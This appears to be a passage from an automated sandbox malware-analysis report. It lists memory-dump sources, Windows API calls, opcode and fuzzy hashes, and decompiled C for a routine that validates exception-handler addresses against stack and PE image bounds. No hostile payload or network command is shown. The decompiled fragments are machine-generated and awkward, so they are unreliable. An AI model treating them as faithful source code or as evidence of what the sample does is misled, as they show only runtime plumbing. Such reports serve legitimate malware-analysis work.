                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,702AB7DA,?,?,00000008,?,?,702AB472,00000000), ref: 702ABA0C
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: 2067085422609dea880da1f8bda7d97184be07821d7d788fa3059a466c7774dc
                  • Instruction ID: 3e9ce8427245c29aafc3da57edb00884b57f6bdcab359180f5f8029c6ff381a4
                  • Opcode Fuzzy Hash: 2067085422609dea880da1f8bda7d97184be07821d7d788fa3059a466c7774dc
                  • Instruction Fuzzy Hash: DEB13A7261060ADFD706CF28C486B597BB4FF05364F25865CE99ACF2A2C735E9A1CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00DCB159(long _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				short* _v32;
                  				void _v36;
                  				void* _t57;
                  				signed int _t58;
                  				signed int _t61;
                  				signed int _t62;
                  				void* _t63;
                  				signed int* _t68;
                  				intOrPtr* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr _t72;
                  				intOrPtr _t75;
                  				void* _t76;
                  				signed int _t77;
                  				void* _t78;
                  				void _t80;
                  				signed int _t81;
                  				signed int _t84;
                  				signed int _t86;
                  				short* _t87;
                  				void* _t89;
                  				signed int* _t90;
                  				long _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				signed int _t100;
                  				signed int _t102;
                  				void* _t104;
                  				long _t108;
                  				signed int _t110;
                  
                  				_t108 = _a4;
                  				_t76 =  *(_t108 + 8);
                  				if((_t76 & 0x00000003) != 0) {
                  					L3:
                  					return 0;
                  				}
                  				_a4 =  *[fs:0x4];
                  				_v8 =  *[fs:0x8];
                  				if(_t76 < _v8 || _t76 >= _a4) {
                  					_t102 =  *(_t108 + 0xc);
                  					__eflags = _t102 - 0xffffffff;
                  					if(_t102 != 0xffffffff) {
                  						_t91 = 0;
                  						__eflags = 0;
                  						_a4 = 0;
                  						_t57 = _t76;
                  						do {
                  							_t80 =  *_t57;
                  							__eflags = _t80 - 0xffffffff;
                  							if(_t80 == 0xffffffff) {
                  								goto L9;
                  							}
                  							__eflags = _t80 - _t91;
                  							if(_t80 >= _t91) {
                  								L20:
                  								_t63 = 0;
                  								L60:
                  								return _t63;
                  							}
                  							L9:
                  							__eflags =  *(_t57 + 4);
                  							if( *(_t57 + 4) != 0) {
                  								_t12 =  &_a4;
                  								 *_t12 = _a4 + 1;
                  								__eflags =  *_t12;
                  							}
                  							_t91 = _t91 + 1;
                  							_t57 = _t57 + 0xc;
                  							__eflags = _t91 - _t102;
                  						} while (_t91 <= _t102);
                  						__eflags = _a4;
                  						if(_a4 == 0) {
                  							L15:
                  							_t81 =  *0xdcd290; // 0x0
                  							_t110 = _t76 & 0xfffff000;
                  							_t58 = 0;
                  							__eflags = _t81;
                  							if(_t81 <= 0) {
                  								L18:
                  								_t104 = _t102 | 0xffffffff;
                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                  								__eflags = _t61;
                  								if(_t61 < 0) {
                  									_t62 = 0;
                  									__eflags = 0;
                  								} else {
                  									_t62 = _a4;
                  								}
                  								__eflags = _t62;
                  								if(_t62 == 0) {
                  									L59:
                  									_t63 = _t104;
                  									goto L60;
                  								} else {
                  									__eflags = _v12 - 0x1000000;
                  									if(_v12 != 0x1000000) {
                  										goto L59;
                  									}
                  									__eflags = _v16 & 0x000000cc;
                  									if((_v16 & 0x000000cc) == 0) {
                  										L46:
                  										_t63 = 1;
                  										 *0xdcd2d8 = 1;
                  										__eflags =  *0xdcd2d8;
                  										if( *0xdcd2d8 != 0) {
                  											goto L60;
                  										}
                  										_t84 =  *0xdcd290; // 0x0
                  										__eflags = _t84;
                  										_t93 = _t84;
                  										if(_t84 <= 0) {
                  											L51:
                  											__eflags = _t93;
                  											if(_t93 != 0) {
                  												L58:
                  												 *0xdcd2d8 = 0;
                  												goto L5;
                  											}
                  											_t77 = 0xf;
                  											__eflags = _t84 - _t77;
                  											if(_t84 <= _t77) {
                  												_t77 = _t84;
                  											}
                  											_t94 = 0;
                  											__eflags = _t77;
                  											if(_t77 < 0) {
                  												L56:
                  												__eflags = _t84 - 0x10;
                  												if(_t84 < 0x10) {
                  													_t86 = _t84 + 1;
                  													__eflags = _t86;
                  													 *0xdcd290 = _t86;
                  												}
                  												goto L58;
                  											} else {
                  												do {
                  													_t68 = 0xdcd298 + _t94 * 4;
                  													_t94 = _t94 + 1;
                  													__eflags = _t94 - _t77;
                  													 *_t68 = _t110;
                  													_t110 =  *_t68;
                  												} while (_t94 <= _t77);
                  												goto L56;
                  											}
                  										}
                  										_t69 = 0xdcd294 + _t84 * 4;
                  										while(1) {
                  											__eflags =  *_t69 - _t110;
                  											if( *_t69 == _t110) {
                  												goto L51;
                  											}
                  											_t93 = _t93 - 1;
                  											_t69 = _t69 - 4;
                  											__eflags = _t93;
                  											if(_t93 > 0) {
                  												continue;
                  											}
                  											goto L51;
                  										}
                  										goto L51;
                  									}
                  									_t87 = _v32;
                  									__eflags =  *_t87 - 0x5a4d;
                  									if( *_t87 != 0x5a4d) {
                  										goto L59;
                  									}
                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                  									__eflags =  *_t71 - 0x4550;
                  									if( *_t71 != 0x4550) {
                  										goto L59;
                  									}
                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                  										goto L59;
                  									}
                  									_t78 = _t76 - _t87;
                  									__eflags =  *((short*)(_t71 + 6));
                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                  									if( *((short*)(_t71 + 6)) <= 0) {
                  										goto L59;
                  									}
                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                  									__eflags = _t78 - _t72;
                  									if(_t78 < _t72) {
                  										goto L46;
                  									}
                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                  										goto L46;
                  									}
                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                  										goto L20;
                  									}
                  									goto L46;
                  								}
                  							} else {
                  								goto L16;
                  							}
                  							while(1) {
                  								L16:
                  								__eflags =  *((intOrPtr*)(0xdcd298 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0xdcd298 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 + 1;
                  								__eflags = _t58 - _t81;
                  								if(_t58 < _t81) {
                  									continue;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t58;
                  							if(_t58 <= 0) {
                  								goto L5;
                  							}
                  							 *0xdcd2d8 = 1;
                  							__eflags =  *0xdcd2d8;
                  							if( *0xdcd2d8 != 0) {
                  								goto L5;
                  							}
                  							__eflags =  *((intOrPtr*)(0xdcd298 + _t58 * 4)) - _t110;
                  							if( *((intOrPtr*)(0xdcd298 + _t58 * 4)) == _t110) {
                  								L32:
                  								_t100 = 0;
                  								__eflags = _t58;
                  								if(_t58 < 0) {
                  									L34:
                  									 *0xdcd2d8 = 0;
                  									goto L5;
                  								} else {
                  									goto L33;
                  								}
                  								do {
                  									L33:
                  									_t90 = 0xdcd298 + _t100 * 4;
                  									_t100 = _t100 + 1;
                  									__eflags = _t100 - _t58;
                  									 *_t90 = _t110;
                  									_t110 =  *_t90;
                  								} while (_t100 <= _t58);
                  								goto L34;
                  							}
                  							_t25 = _t81 - 1; // -1
                  							_t58 = _t25;
                  							__eflags = _t58;
                  							if(_t58 < 0) {
                  								L28:
                  								__eflags = _t81 - 0x10;
                  								if(_t81 < 0x10) {
                  									_t81 = _t81 + 1;
                  									__eflags = _t81;
                  									 *0xdcd290 = _t81;
                  								}
                  								_t28 = _t81 - 1; // 0x0
                  								_t58 = _t28;
                  								goto L32;
                  							} else {
                  								goto L25;
                  							}
                  							while(1) {
                  								L25:
                  								__eflags =  *((intOrPtr*)(0xdcd298 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0xdcd298 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 - 1;
                  								__eflags = _t58;
                  								if(_t58 >= 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							__eflags = _t58;
                  							if(__eflags >= 0) {
                  								if(__eflags == 0) {
                  									goto L34;
                  								}
                  								goto L32;
                  							}
                  							goto L28;
                  						}
                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                  						__eflags = _t75 - _v8;
                  						if(_t75 < _v8) {
                  							goto L20;
                  						}
                  						__eflags = _t75 - _t108;
                  						if(_t75 >= _t108) {
                  							goto L20;
                  						}
                  						goto L15;
                  					}
                  					L5:
                  					_t63 = 1;
                  					goto L60;
                  				} else {
                  					goto L3;
                  				}
                  			}


                  APIs
                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00DCB20A
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: MemoryQueryVirtual
                  • String ID:
                  • API String ID: 2850889275-0
                  • Opcode ID: 4d49e436d1e03bdf762aa41d616c010f7886ccecd44deeb04179bc0a6f250e85
                  • Instruction ID: 7d78c200b4f6ecb224308c379c6672c1f0119a577560bcb8e9d1c9a0a8921e56
                  • Opcode Fuzzy Hash: 4d49e436d1e03bdf762aa41d616c010f7886ccecd44deeb04179bc0a6f250e85
                  • Instruction Fuzzy Hash: A16192306007479BDB19CE29C992F69B3A2EB45374F2C863ED845DB294E731DD42CA74
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E702523C5(long _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				short* _v32;
                  				void _v36;
                  				void* _t57;
                  				signed int _t58;
                  				signed int _t61;
                  				signed int _t62;
                  				void* _t63;
                  				signed int* _t68;
                  				intOrPtr* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr _t72;
                  				intOrPtr _t75;
                  				void* _t76;
                  				signed int _t77;
                  				void* _t78;
                  				void _t80;
                  				signed int _t81;
                  				signed int _t84;
                  				signed int _t86;
                  				short* _t87;
                  				void* _t89;
                  				signed int* _t90;
                  				long _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				signed int _t100;
                  				signed int _t102;
                  				void* _t104;
                  				long _t108;
                  				signed int _t110;
                  
                  				_t108 = _a4;
                  				_t76 =  *(_t108 + 8);
                  				if((_t76 & 0x00000003) != 0) {
                  					L3:
                  					return 0;
                  				}
                  				_a4 =  *[fs:0x4];
                  				_v8 =  *[fs:0x8];
                  				if(_t76 < _v8 || _t76 >= _a4) {
                  					_t102 =  *(_t108 + 0xc);
                  					__eflags = _t102 - 0xffffffff;
                  					if(_t102 != 0xffffffff) {
                  						_t91 = 0;
                  						__eflags = 0;
                  						_a4 = 0;
                  						_t57 = _t76;
                  						do {
                  							_t80 =  *_t57;
                  							__eflags = _t80 - 0xffffffff;
                  							if(_t80 == 0xffffffff) {
                  								goto L9;
                  							}
                  							__eflags = _t80 - _t91;
                  							if(_t80 >= _t91) {
                  								L20:
                  								_t63 = 0;
                  								L60:
                  								return _t63;
                  							}
                  							L9:
                  							__eflags =  *(_t57 + 4);
                  							if( *(_t57 + 4) != 0) {
                  								_t12 =  &_a4;
                  								 *_t12 = _a4 + 1;
                  								__eflags =  *_t12;
                  							}
                  							_t91 = _t91 + 1;
                  							_t57 = _t57 + 0xc;
                  							__eflags = _t91 - _t102;
                  						} while (_t91 <= _t102);
                  						__eflags = _a4;
                  						if(_a4 == 0) {
                  							L15:
                  							_t81 =  *0x70254178;
                  							_t110 = _t76 & 0xfffff000;
                  							_t58 = 0;
                  							__eflags = _t81;
                  							if(_t81 <= 0) {
                  								L18:
                  								_t104 = _t102 | 0xffffffff;
                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                  								__eflags = _t61;
                  								if(_t61 < 0) {
                  									_t62 = 0;
                  									__eflags = 0;
                  								} else {
                  									_t62 = _a4;
                  								}
                  								__eflags = _t62;
                  								if(_t62 == 0) {
                  									L59:
                  									_t63 = _t104;
                  									goto L60;
                  								} else {
                  									__eflags = _v12 - 0x1000000;
                  									if(_v12 != 0x1000000) {
                  										goto L59;
                  									}
                  									__eflags = _v16 & 0x000000cc;
                  									if((_v16 & 0x000000cc) == 0) {
                  										L46:
                  										_t63 = 1;
                  										 *0x702541c0 = 1;
                  										__eflags =  *0x702541c0;
                  										if( *0x702541c0 != 0) {
                  											goto L60;
                  										}
                  										_t84 =  *0x70254178;
                  										__eflags = _t84;
                  										_t93 = _t84;
                  										if(_t84 <= 0) {
                  											L51:
                  											__eflags = _t93;
                  											if(_t93 != 0) {
                  												L58:
                  												 *0x702541c0 = 0;
                  												goto L5;
                  											}
                  											_t77 = 0xf;
                  											__eflags = _t84 - _t77;
                  											if(_t84 <= _t77) {
                  												_t77 = _t84;
                  											}
                  											_t94 = 0;
                  											__eflags = _t77;
                  											if(_t77 < 0) {
                  												L56:
                  												__eflags = _t84 - 0x10;
                  												if(_t84 < 0x10) {
                  													_t86 = _t84 + 1;
                  													__eflags = _t86;
                  													 *0x70254178 = _t86;
                  												}
                  												goto L58;
                  											} else {
                  												do {
                  													_t68 = 0x70254180 + _t94 * 4;
                  													_t94 = _t94 + 1;
                  													__eflags = _t94 - _t77;
                  													 *_t68 = _t110;
                  													_t110 =  *_t68;
                  												} while (_t94 <= _t77);
                  												goto L56;
                  											}
                  										}
                  										_t69 = 0x7025417c + _t84 * 4;
                  										while(1) {
                  											__eflags =  *_t69 - _t110;
                  											if( *_t69 == _t110) {
                  												goto L51;
                  											}
                  											_t93 = _t93 - 1;
                  											_t69 = _t69 - 4;
                  											__eflags = _t93;
                  											if(_t93 > 0) {
                  												continue;
                  											}
                  											goto L51;
                  										}
                  										goto L51;
                  									}
                  									_t87 = _v32;
                  									__eflags =  *_t87 - 0x5a4d;
                  									if( *_t87 != 0x5a4d) {
                  										goto L59;
                  									}
                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                  									__eflags =  *_t71 - 0x4550;
                  									if( *_t71 != 0x4550) {
                  										goto L59;
                  									}
                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                  										goto L59;
                  									}
                  									_t78 = _t76 - _t87;
                  									__eflags =  *((short*)(_t71 + 6));
                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                  									if( *((short*)(_t71 + 6)) <= 0) {
                  										goto L59;
                  									}
                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                  									__eflags = _t78 - _t72;
                  									if(_t78 < _t72) {
                  										goto L46;
                  									}
                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                  										goto L46;
                  									}
                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                  										goto L20;
                  									}
                  									goto L46;
                  								}
                  							} else {
                  								goto L16;
                  							}
                  							while(1) {
                  								L16:
                  								__eflags =  *((intOrPtr*)(0x70254180 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0x70254180 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 + 1;
                  								__eflags = _t58 - _t81;
                  								if(_t58 < _t81) {
                  									continue;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t58;
                  							if(_t58 <= 0) {
                  								goto L5;
                  							}
                  							 *0x702541c0 = 1;
                  							__eflags =  *0x702541c0;
                  							if( *0x702541c0 != 0) {
                  								goto L5;
                  							}
                  							__eflags =  *((intOrPtr*)(0x70254180 + _t58 * 4)) - _t110;
                  							if( *((intOrPtr*)(0x70254180 + _t58 * 4)) == _t110) {
                  								L32:
                  								_t100 = 0;
                  								__eflags = _t58;
                  								if(_t58 < 0) {
                  									L34:
                  									 *0x702541c0 = 0;
                  									goto L5;
                  								} else {
                  									goto L33;
                  								}
                  								do {
                  									L33:
                  									_t90 = 0x70254180 + _t100 * 4;
                  									_t100 = _t100 + 1;
                  									__eflags = _t100 - _t58;
                  									 *_t90 = _t110;
                  									_t110 =  *_t90;
                  								} while (_t100 <= _t58);
                  								goto L34;
                  							}
                  							_t58 = _t81 - 1;
                  							__eflags = _t58;
                  							if(_t58 < 0) {
                  								L28:
                  								__eflags = _t81 - 0x10;
                  								if(_t81 < 0x10) {
                  									_t81 = _t81 + 1;
                  									__eflags = _t81;
                  									 *0x70254178 = _t81;
                  								}
                  								_t58 = _t81 - 1;
                  								goto L32;
                  							} else {
                  								goto L25;
                  							}
                  							while(1) {
                  								L25:
                  								__eflags =  *((intOrPtr*)(0x70254180 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0x70254180 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 - 1;
                  								__eflags = _t58;
                  								if(_t58 >= 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							__eflags = _t58;
                  							if(__eflags >= 0) {
                  								if(__eflags == 0) {
                  									goto L34;
                  								}
                  								goto L32;
                  							}
                  							goto L28;
                  						}
                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                  						__eflags = _t75 - _v8;
                  						if(_t75 < _v8) {
                  							goto L20;
                  						}
                  						__eflags = _t75 - _t108;
                  						if(_t75 >= _t108) {
                  							goto L20;
                  						}
                  						goto L15;
                  					}
                  					L5:
                  					_t63 = 1;
                  					goto L60;
                  				} else {
                  					goto L3;
                  				}
                  			}

                  APIs
                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 70252476
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: MemoryQueryVirtual
                  • String ID:
                  • API String ID: 2850889275-0
                  • Opcode ID: 59a127ab8cd0c1548f55e35f948e02c15b31d3e3c5c61c45683f545d04c6d1c7
                  • Instruction ID: eda3d13907c31daf9b245ffd3f7bec79cbd4ba5fc9fb6ecbc4457250b10c9739
                  • Opcode Fuzzy Hash: 59a127ab8cd0c1548f55e35f948e02c15b31d3e3c5c61c45683f545d04c6d1c7
                  • Instruction Fuzzy Hash: 0261AF336106069FD71ACF29C89071D76BAEB86358B7480E9D807C72D4F770DDAE8A58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8dac76d2c2c9fe9577923899ea263fae58271abe95bf8b3241f10cc9d03487e4
                  • Instruction ID: 255553add18244a7f833a0842206cfabbb2d09a167123736776fda216489e2d7
                  • Opcode Fuzzy Hash: 8dac76d2c2c9fe9577923899ea263fae58271abe95bf8b3241f10cc9d03487e4
                  • Instruction Fuzzy Hash: A44194B2804219AEDB10DF79CCC9BAEB7B9EB45300F1442DDE84DD3211DA359E948F54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                    • Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D13A
                    • Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D170
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A5277
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast_free$InfoLocale
                  • String ID:
                  • API String ID: 2003897158-0
                  • Opcode ID: aacabef2aa4e6d484b34c092d6a479d53a1892fcc6cdb9e49e1115ebed5efa6f
                  • Instruction ID: 89ec2d6b89976dc8609193a4be31eae77ec116dbbcaa120cdfc5a0e6e2382bfd
                  • Opcode Fuzzy Hash: aacabef2aa4e6d484b34c092d6a479d53a1892fcc6cdb9e49e1115ebed5efa6f
                  • Instruction Fuzzy Hash: 7E217CB3610226ABDB198E25CC42BAF73A8EF04314F20407AFE02D6540EF39A9659F54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  • EnumSystemLocalesW.KERNEL32(702A4FD0,00000001,00000000,?,-00000050,?,702A55FE,00000000,?,?,?,00000055,?), ref: 702A4F1C
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem
                  • String ID:
                  • API String ID: 2417226690-0
                  • Opcode ID: 392e12f7921252c43087e079c211c6e4a5589ea9201b869fcae66cdc38396fe1
                  • Instruction ID: a973b1cfac2d5c66febbfc76e1b3b51d90a90531a0b57c2f9d2cbf414e999ca4
                  • Opcode Fuzzy Hash: 392e12f7921252c43087e079c211c6e4a5589ea9201b869fcae66cdc38396fe1
                  • Instruction Fuzzy Hash: 8F1106772003055FD7089F39889166EB7A2FFC0318B19452DED4787A40DBB1B912CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,702A51EC,00000000,00000000,?), ref: 702A547B
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast$InfoLocale
                  • String ID:
                  • API String ID: 3736152602-0
                  • Opcode ID: 760022a274bc110460f4259aa2c5d6afa56d99120fd62d74b11ca57205f09c24
                  • Instruction ID: 3cdff19f9ea86fff7fc33633e2bf09bd6a84a9123920f20e62be45b901e683e6
                  • Opcode Fuzzy Hash: 760022a274bc110460f4259aa2c5d6afa56d99120fd62d74b11ca57205f09c24
                  • Instruction Fuzzy Hash: 91F0F977510522AFDB144E6088067BF7778EB44355F114429ED47A3140DE78FDA1CA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  • EnumSystemLocalesW.KERNEL32(702A5223,00000001,?,?,-00000050,?,702A55C2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 702A4F8F
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem
                  • String ID:
                  • API String ID: 2417226690-0
                  • Opcode ID: 06fec2c07e4345184a75ded7c07124668cb73cef3a12ffb1b3981e0accb56fc8
                  • Instruction ID: 21e14d57efb61d46d1987b148c9fef2aba0a04eff62480f302569ca63fda74d1
                  • Opcode Fuzzy Hash: 06fec2c07e4345184a75ded7c07124668cb73cef3a12ffb1b3981e0accb56fc8
                  • Instruction Fuzzy Hash: 1BF046772003045FC7145F359C85B6EBBA5EFC0328F15842DFD068BA80CAB2AC12CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D36B: RtlEnterCriticalSection.NTDLL(-702C0F80), ref: 7029D37A
                  • EnumSystemLocalesW.KERNEL32(7029D3CA,00000001,702BE9C0,0000000C,7029D84C,00000000), ref: 7029D40F
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: CriticalEnterEnumLocalesSectionSystem
                  • String ID:
                  • API String ID: 1272433827-0
                  • Opcode ID: 9f10f1909f93043d439102c264a066c6bd495935dad1c0d6160ad12b7442e7b8
                  • Instruction ID: 013e6a14cbfdc6f74659ebda08889a75dc5e80c75138491375888503cd6d5011
                  • Opcode Fuzzy Hash: 9f10f1909f93043d439102c264a066c6bd495935dad1c0d6160ad12b7442e7b8
                  • Instruction Fuzzy Hash: 79F08C73A20600DFD700DF98D806B8D77F0FB05325F10421AF811AB290CB7569109F48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  • EnumSystemLocalesW.KERNEL32(702A4DB8,00000001,?,?,?,702A5620,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 702A4E96
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem
                  • String ID:
                  • API String ID: 2417226690-0
                  • Opcode ID: 58f76e36086b4128b68e6845166066218104ca8e01509decd48dac3319ca0747
                  • Instruction ID: 448ede729c8cbdb6d6f9211c92f7e48c9f816b17dabcc201687588f8fbbb2e2b
                  • Opcode Fuzzy Hash: 58f76e36086b4128b68e6845166066218104ca8e01509decd48dac3319ca0747
                  • Instruction Fuzzy Hash: 4CF0553730020597CB049F35C809B6EBFA4EFC2320F47405AEE068B240CA72D843CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 45bf6703caf006abf8a0f11949f7400dce47d27e331a046f6c45b86395e5ca7b
                  • Instruction ID: b22a9549269c81c45a327de8ce2032a5b472786862a45a13a8228893e2c033fa
                  • Opcode Fuzzy Hash: 45bf6703caf006abf8a0f11949f7400dce47d27e331a046f6c45b86395e5ca7b
                  • Instruction Fuzzy Hash: 99614B736302076ADB178E6487A17BE73BAEF46604F10042EE843FB2C8D6649D61C75D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID: 0
                  • API String ID: 0-4108050209
                  • Opcode ID: 6e6dd35b963990a8f7c93dd20f2b142c5e3829ef01a5b52b756a3ef116bbd0b9
                  • Instruction ID: da7c745f6c9f9628de46c09657fb2018fa35c23defddb39de3270b3a42eea6a5
                  • Opcode Fuzzy Hash: 6e6dd35b963990a8f7c93dd20f2b142c5e3829ef01a5b52b756a3ef116bbd0b9
                  • Instruction Fuzzy Hash: B56159336303069ADB178E2487917BE73BEBF49600F50081DE583FB694D665AD61CB4D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a13e76ba645a525bc4852397099c7e763f6fcf461500e36aac7eb26245ea4cd1
                  • Instruction ID: 70329fad845e1109b68520525d1df47e14fd04f9808e62c9355f486da8c072af
                  • Opcode Fuzzy Hash: a13e76ba645a525bc4852397099c7e763f6fcf461500e36aac7eb26245ea4cd1
